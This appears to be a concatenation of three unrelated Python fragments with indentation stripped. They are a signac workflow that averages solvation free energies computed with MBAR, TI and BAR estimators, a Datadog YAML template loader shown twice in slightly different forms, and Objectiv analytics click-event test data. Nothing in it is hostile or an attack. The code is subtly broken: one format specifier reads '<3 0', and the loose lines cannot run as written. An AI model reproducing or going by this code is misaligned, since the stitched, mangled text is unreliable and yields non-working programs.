"walltime": walltime_gomc_analysis_hr,
}
)
@FlowProject.pre(
lambda *jobs: all(
part_4c_job_production_run_completed_properly(job)
for job in jobs
)
)
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.post(part_5a_analysis_individual_simulation_averages_completed)
@flow.with_job
def part_5a_analysis_individual_simulation_averages(*jobs):
# remove the total averaged replicate data and all analysis data after this,
# as it is no longer valid when adding more simulations
if os.path.isfile(f'../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}'):
os.remove(f'../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}')
output_column_temp_title = 'temp_K' # column title title for temp
output_column_solute_title = 'solute' # column title title for temp
output_column_dFE_MBAR_title = 'dFE_MBAR_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_MBAR_std_title = 'dFE_MBAR_std_kcal_per_mol' # column title title for ds_MBAR
output_column_dFE_TI_title = 'dFE_TI_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_TI_std_title = 'dFE_TI_std_kcal_per_mol' # column title title for ds_MBAR
output_column_dFE_BAR_title = 'dFE_BAR_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_BAR_std_title = 'dFE_BAR_std_kcal_per_mol' # column title title for ds_MBAR
# get the averages from each individual simulation and write the csv's.
for job in jobs:
files = []
k_b = 1.9872036E-3 # kcal/mol/K
temperature = job.sp.production_temperature_K
k_b_T = temperature * k_b
for initial_state_iter in range(0, number_of_lambda_spacing_including_zero_int):
reading_filename_box_0_iter = f'Free_Energy_BOX_0_{gomc_production_control_file_name_str}_' \
f'initial_state_{initial_state_iter}.dat'
files.append(reading_filename_box_0_iter)
# for TI estimator
dHdl = pd.concat([extract_dHdl(job.fn(f), T=temperature) for f in files])
ti = TI().fit(dHdl)
delta_ti, delta_std_ti = get_delta_TI_or_MBAR(ti, k_b_T)
# for MBAR estimator
u_nk = pd.concat([extract_u_nk(job.fn(f), T=temperature) for f in files])
mbar = MBAR().fit(u_nk)
delta_mbar, delta_std_mbar = get_delta_TI_or_MBAR(mbar, k_b_T)
# for BAR estimator
bar = BAR().fit(u_nk)
delta_bar, delta_std_bar = get_delta_BAR(bar, k_b_T)
# write the data out in each job
box_0_replicate_data_txt_file = open(job.fn(output_replicate_txt_file_name_box_0), "w")
box_0_replicate_data_txt_file.write(
f"{output_column_temp_title: <30} "
f"{output_column_solute_title: <30} "
f"{output_column_dFE_MBAR_title: <30} "
f"{output_column_dFE_MBAR_std_title: <30} "
f"{output_column_dFE_TI_title: <30} "
f"{output_column_dFE_TI_std_title: <30} "
f"{output_column_dFE_BAR_title: <30} "
f"{output_column_dFE_BAR_std_title: <30} "
f" \n"
)
box_0_replicate_data_txt_file.write(
f"{job.sp.production_temperature_K: <30} "
f"{job.sp.solute: <30} "
f"{delta_mbar: <30} "
f"{delta_std_mbar: <30} "
f"{delta_ti: <30} "
f"{delta_std_ti: <30} "
f"{delta_bar: <30} "
f"{delta_std_bar: <30} "
f" \n"
)
# ******************************************************
# ******************************************************
# data analysis - get the average data from each individual simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# data analysis - get the average and std. dev. from/across all the replicates (start)
# ******************************************************
# ******************************************************
@aggregator.groupby(key=statepoint_without_replica,
sort_by="production_temperature_K",
sort_ascending=True
)
@Project.operation.with_directives(
{
"np": 1,
"ngpu": 0,
"memory": memory_needed,
"walltime": walltime_gomc_analysis_hr,
}
)
@Project.pre(lambda *jobs: all(part_5a_analysis_individual_simulation_averages_completed(j)
for j in jobs[0]._project))
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.pre(part_5a_analysis_individual_simulation_averages_completed)
@Project.post(part_5b_analysis_replica_averages_completed)
def part_5b_analysis_replica_averages(*jobs):
# ***************************************************
# create the required lists and file labels for the replicates (start)
# ***************************************************
# output and labels
output_column_temp_title = 'temp_K' # column title title for temp
output_column_temp_std_title = 'temp_std_K' # column title title for temp
output_column_solute_title = 'solute' # column title title for temp
output_column_dFE_MBAR_title = 'dFE_MBAR_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_MBAR_std_title = 'dFE_MBAR_std_kcal_per_mol' # column title title for ds_MBAR
output_column_dFE_TI_title = 'dFE_TI_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_TI_std_title = 'dFE_TI_std_kcal_per_mol' # column title title for ds_MBAR
output_column_dFE_BAR_title = 'dFE_BAR_kcal_per_mol' # column title title for delta_MBAR
output_column_dFE_BAR_std_title = 'dFE_BAR_std_kcal_per_mol' # column title title for ds_MBAR
# get the list used in this function
temp_repilcate_list = []
solute_repilcate_list = []
delta_MBAR_repilcate_box_0_list = []
delta_TI_repilcate_box_0_list = []
delta_BAR_repilcate_box_0_list = []
output_txt_file_header = f"{output_column_temp_title: <30} " \
f"{output_column_temp_std_title: <30} " \
f"{output_column_solute_title: <30} "\
f"{output_column_dFE_MBAR_title: <30} "\
f"{output_column_dFE_MBAR_std_title: <30} "\
f"{output_column_dFE_TI_title: <3 0} "\
f"{output_column_dFE_TI_std_title: <30} "\
f"{output_column_dFE_BAR_title: <30} "\
f"{output_column_dFE_BAR_std_title: <30} "\
f"\n"
write_file_path_and_name_box_0 = f'analysis/{output_avg_std_of_replicates_txt_file_name_box_0}'
if os.path.isfile(write_file_path_and_name_box_0):
box_box_0_data_txt_file = open(write_file_path_and_name_box_0, "a")
else:
box_box_0_data_txt_file = open(write_file_path_and_name_box_0, "w")
box_box_0_data_txt_file.write(output_txt_file_header)
# ***************************************************
# create the required lists and file labels for the replicates (end)
# ***************************************************
for job in jobs:
# *************************
# drawing in data from single file and extracting specific rows from box 0 (start)
# *************************
reading_file_box_box_0 = job.fn(output_replicate_txt_file_name_box_0)
data_box_box_0 = pd.read_csv(reading_file_box_box_0, sep='\s+', header=0, na_values='NaN', index_col=False)
data_box_box_0 = pd.DataFrame(data_box_box_0)
temp_repilcate_list.append(data_box_box_0.loc[:, output_column_temp_title][0])
solute_repilcate_list.append(data_box_box_0.loc[:, output_column_solute_title][0])
delta_MBAR_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_MBAR_title][0])
delta_TI_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_TI_title][0])
delta_BAR_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_BAR_title][0])
# *************************
# drawing in data from single file and extracting specific rows from box 0 (end)
# *************************
# *************************
# get the replica means and std.devs (start)
# *************************
temp_mean = np.mean(temp_repilcate_list)
temp_std = np.std(temp_repilcate_list, ddof=1)
solute_iter = solute_repilcate_list[0]
delta_MBAR_mean_box_box_0 = np.mean(delta_MBAR_repilcate_box_0_list)
delta_TI_mean_box_box_0 = np.mean(delta_TI_repilcate_box_0_list)
delta_BAR_mean_box_box_0 = np.mean(delta_BAR_repilcate_box_0_list)
delta_std_MBAR_mean_box_box_0 = np.std(delta_MBAR_repilcate_box_0_list, ddof=1)
delta_std_TI_mean_box_box_0 = np.std(delta_TI_repilcate_box_0_list, ddof=1)
delta_std_BAR_mean_box_box_0 = np.std(delta_BAR_repilcate_box_0_list, ddof=1)
# *************************
# get the replica means and std.devs (end)
# *************************
# ************************************
# write the analysis data files for the liquid and vapor boxes (start)
# ************************************
box_box_0_data_txt_file.write(
f"{temp_mean: <30} "
f"{temp_std: <30} "
f"{solute_iter: <30} "
f"{delta_MBAR_mean_box_box_0: <30} "
f"{delta_std_MBAR_mean_box_box_0: <30} "
f"{delta_TI_mean_box_box_0: <30} "
f"{delta_std_TI_mean_box_box_0: <30} "
f"{delta_BAR_mean_box_box_0: <30} "
f"{delta_std_BAR_mean_box_box_0: <30} "
f" \n"
)
# ************************************
# write the analysis data files for the liquid and vapor boxes (end)
# ************************************
# ******************************************************
# ******************************************************
# data analysis - get the average and std. dev. from/across all the replicates (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# signac end code (start)
# ******************************************************
# ******************************************************
if __name__ == "__main__":
pr = Project()
pr.main()
# ******************************************************
# ******************************************************
# signac end code (end)
# ******************************************************
# ******************************************************
|
# (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from copy import deepcopy
import yaml
from ...utils import file_exists, path_join, read_file
VALID_EXTENSIONS = ('yaml', 'yml')
class BaseTemplate(object):
# Override in subclass with path to templates
TEMPLATES_DIR = None
def __init__(self, paths=None):
if self.TEMPLATES_DIR is None:
raise NotImplementedError('Cannot be instantiated directly, subclass and override TEMPLATES_DIR')
self.templates = {}
self.paths = []
if paths:
self.paths.extend(paths)
self.paths.append(self.TEMPLATES_DIR)
def load(self, template):
path_parts = template.split('/')
branches = path_parts.pop().split('.')
path_parts.append(branches.pop(0))
possible_template_paths = (
f'{path_join(path, *path_parts)}.{extension}' for path in self.paths for extension in VALID_EXTENSIONS
)
for template_path in possible_template_paths:
if file_exists(template_path):
break
else:
raise ValueError(f"Template `{"/".join(path_parts)}` does not exist")
if template_path in self.templates:
data = self.templates[template_path]
else:
try:
data = yaml.safe_load(read_file(template_path))
except Exception as e:
raise ValueError(f'Unable to parse template `{template_path}`: {e}')
self.templates[template_path] = data
data = deepcopy(data)
for i, branch in enumerate(branches):
if isinstance(data, dict):
if branch in data:
data = data[branch]
else:
raise ValueError(f"Template `{"/".join(path_parts)}` has no element `{".".join(branches[:i + 1])}`")
elif isinstance(data, list):
for item in data:
if isinstance(item, dict) and item.get('name') == branch:
data = item
break
else:
raise ValueError(
'Template `{}` has no named element `{}`'.format(
'/'.join(path_parts), '.'.join(branches[: i + 1])
)
)
else:
raise ValueError(
'Template `{}.{}` does not refer to a mapping, rather it is type `{}`'.format(
'/'.join(path_parts), '.'.join(branches[:i]), type(data).__name__
)
)
return data
@staticmethod
def apply_overrides(template, overrides):
errors = []
for override, value in sorted(overrides.items()):
root = template
override_keys = override.split('.')
final_key = override_keys.pop()
intermediate_error = ''
# Iterate through all but the last key, attempting to find a dictionary at every step
for i, key in enumerate(override_keys):
if isinstance(root, dict):
if i == 0 and root.get('name') == key:
continue
if key in root:
root = root[key]
else:
intermediate_error = (
f"Template override `{".".join(override_keys[:i])}` has no named mapping `{key}`"
)
break
elif isinstance(root, list):
for item in root:
if isinstance(item, dict) and item.get('name') == key:
root = item
break
else:
intermediate_error = (
f"Template override `{".".join(override_keys[:i])}` has no named mapping `{key}`"
)
break
else:
intermediate_error = (
f"Template override `{".".join(override_keys[:i])}` does not refer to a mapping"
)
break
if intermediate_error:
errors.append(intermediate_error)
continue
# Force assign the desired value to the final key
if isinstance(root, dict):
root[final_key] = value
elif isinstance(root, list):
for i, item in enumerate(root):
if isinstance(item, dict) and item.get('name') == final_key:
root[i] = value
break
else:
intermediate_error = 'Template override has no named mapping `{}`'.format(
'.'.join(override_keys) if override_keys else override
)
else:
intermediate_error = 'Template override `{}` does not refer to a mapping'.format(
'.'.join(override_keys) if override_keys else override
)
if intermediate_error:
errors.append(intermediate_error)
continue
overrides.pop(override)
return errors
| # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from copy import deepcopy
import yaml
from ...utils import file_exists, path_join, read_file
VALID_EXTENSIONS = ('yaml', 'yml')
class BaseTemplate(object):
# Override in subclass with path to templates
TEMPLATES_DIR = None
def __init__(self, paths=None):
if self.TEMPLATES_DIR is None:
raise NotImplementedError('Cannot be instantiated directly, subclass and override TEMPLATES_DIR')
self.templates = {}
self.paths = []
if paths:
self.paths.extend(paths)
self.paths.append(self.TEMPLATES_DIR)
def load(self, template):
path_parts = template.split('/')
branches = path_parts.pop().split('.')
path_parts.append(branches.pop(0))
possible_template_paths = (
f'{path_join(path, *path_parts)}.{extension}' for path in self.paths for extension in VALID_EXTENSIONS
)
for template_path in possible_template_paths:
if file_exists(template_path):
break
else:
raise ValueError(f"Template `{'/'.join(path_parts)}` does not exist")
if template_path in self.templates:
data = self.templates[template_path]
else:
try:
data = yaml.safe_load(read_file(template_path))
except Exception as e:
raise ValueError(f'Unable to parse template `{template_path}`: {e}')
self.templates[template_path] = data
data = deepcopy(data)
for i, branch in enumerate(branches):
if isinstance(data, dict):
if branch in data:
data = data[branch]
else:
raise ValueError(f"Template `{'/'.join(path_parts)}` has no element `{'.'.join(branches[:i + 1])}`")
elif isinstance(data, list):
for item in data:
if isinstance(item, dict) and item.get('name') == branch:
data = item
break
else:
raise ValueError(
'Template `{}` has no named element `{}`'.format(
'/'.join(path_parts), '.'.join(branches[: i + 1])
)
)
else:
raise ValueError(
'Template `{}.{}` does not refer to a mapping, rather it is type `{}`'.format(
'/'.join(path_parts), '.'.join(branches[:i]), type(data).__name__
)
)
return data
@staticmethod
def apply_overrides(template, overrides):
errors = []
for override, value in sorted(overrides.items()):
root = template
override_keys = override.split('.')
final_key = override_keys.pop()
intermediate_error = ''
# Iterate through all but the last key, attempting to find a dictionary at every step
for i, key in enumerate(override_keys):
if isinstance(root, dict):
if i == 0 and root.get('name') == key:
continue
if key in root:
root = root[key]
else:
intermediate_error = (
f"Template override `{'.'.join(override_keys[:i])}` has no named mapping `{key}`"
)
break
elif isinstance(root, list):
for item in root:
if isinstance(item, dict) and item.get('name') == key:
root = item
break
else:
intermediate_error = (
f"Template override `{'.'.join(override_keys[:i])}` has no named mapping `{key}`"
)
break
else:
intermediate_error = (
f"Template override `{'.'.join(override_keys[:i])}` does not refer to a mapping"
)
break
if intermediate_error:
errors.append(intermediate_error)
continue
# Force assign the desired value to the final key
if isinstance(root, dict):
root[final_key] = value
elif isinstance(root, list):
for i, item in enumerate(root):
if isinstance(item, dict) and item.get('name') == final_key:
root[i] = value
break
else:
intermediate_error = 'Template override has no named mapping `{}`'.format(
'.'.join(override_keys) if override_keys else override
)
else:
intermediate_error = 'Template override `{}` does not refer to a mapping'.format(
'.'.join(override_keys) if override_keys else override
)
if intermediate_error:
errors.append(intermediate_error)
continue
overrides.pop(override)
return errors
|
TEST_DATA_OBJECTIV = [
('12b55ed5-4295-4fc1-bf1f-88d64d1ac301','2021-11-30','2021-11-30 10:23:36.287','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "GitHub", "text": "GitHub", "href": "https://github.com/objectiv", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "729c84f9-91d0-4f9f-be58-5cfb2d8130e4", "time": 1636476263115, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac302','2021-11-30','2021-11-30 10:23:36.290','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "main", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "SectionContext", "id": "location-stack", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-docs-location-stack", "text": "Docs - Location Stack", "href": "/docs/taxonomy", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "1049e11c-bb9c-4b84-9dac-b4125998999d", "time": 1636475896879, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac303','2021-11-30','2021-11-30 10:23:36.291','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "header", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-repo-button", "text": "Objectiv on GitHub", "href": "https://github.com/objectiv/objectiv-analytics", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "fd8239de-032f-499a-9849-8e97214ecdf1", "time": 1636475880112, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac304','2021-11-30','2021-11-30 10:23:36.267','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/modeling/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "LinkContext", "id": "notebook-product-analytics", "text": "sandboxed notebook", "href": "https://notebook.objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "a789d8fe-5cd9-4ff0-9780-a56cf094b62a", "time": 1636475922156, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac305','2021-12-01','2021-12-01 10:23:36.276','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "About Us", "text": "About Us", "href": "about", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "67cbfc73-b8bd-40f6-aa8e-88cb73857d09", "time": 1636475947689, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac306','2021-12-01','2021-12-01 10:23:36.279','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://www.objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Contact Us", "text": "Contact Us", "href": "mailto:hi@objectiv.io", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://www.objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "899c18aa-a908-43f9-9827-d4b9072205ea", "time": 1636475983057, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac307','2021-12-02','2021-12-02 10:23:36.281','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://www.objectiv.io/jobs", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "footer", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Cookies", "text": "Cookies", "href": "/privacy/cookies", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://www.objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "837ae9db-497c-4925-a4c9-b2183bd3056b", "time": 1636476007981, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac308','2021-12-02','2021-12-02 10:23:36.281','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "ExpandableSectionContext", "id": "The Project", "_types": ["AbstractContext", "AbstractLocationContext", "ExpandableSectionContext", "SectionContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "5835d00e-4099-44cc-9191-8baccc2d32fa", "time": 1636476074003, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac309','2021-12-02','2021-12-02 14:23:36.282','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "About Us", "text": "About Us", "href": "about", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "fbca9fc6-4b76-459e-968c-0ecf3c78de4d", "cookie_id": "fbca9fc6-4b76-459e-968c-0ecf3c78de4d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "690ada97-c0fa-4378-9c04-bd1f7753505a", "time": 1636476111218, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac310','2021-12-03','2021-12-03 10:23:36.283','b2df75d2-d7ca-48ac-9747-af47d7a4a2b4','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/about", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Docs", "text": "Docs", "href": "https://objectiv.io/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 10; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "5b1e395f-ef4c-438c-aab2-ae0aa19131ee", "cookie_id": "5b1e395f-ef4c-438c-aab2-ae0aa19131ee", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "089ff754-35d6-49da-bb32-dc9031b10289", "time": 1636476142139, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
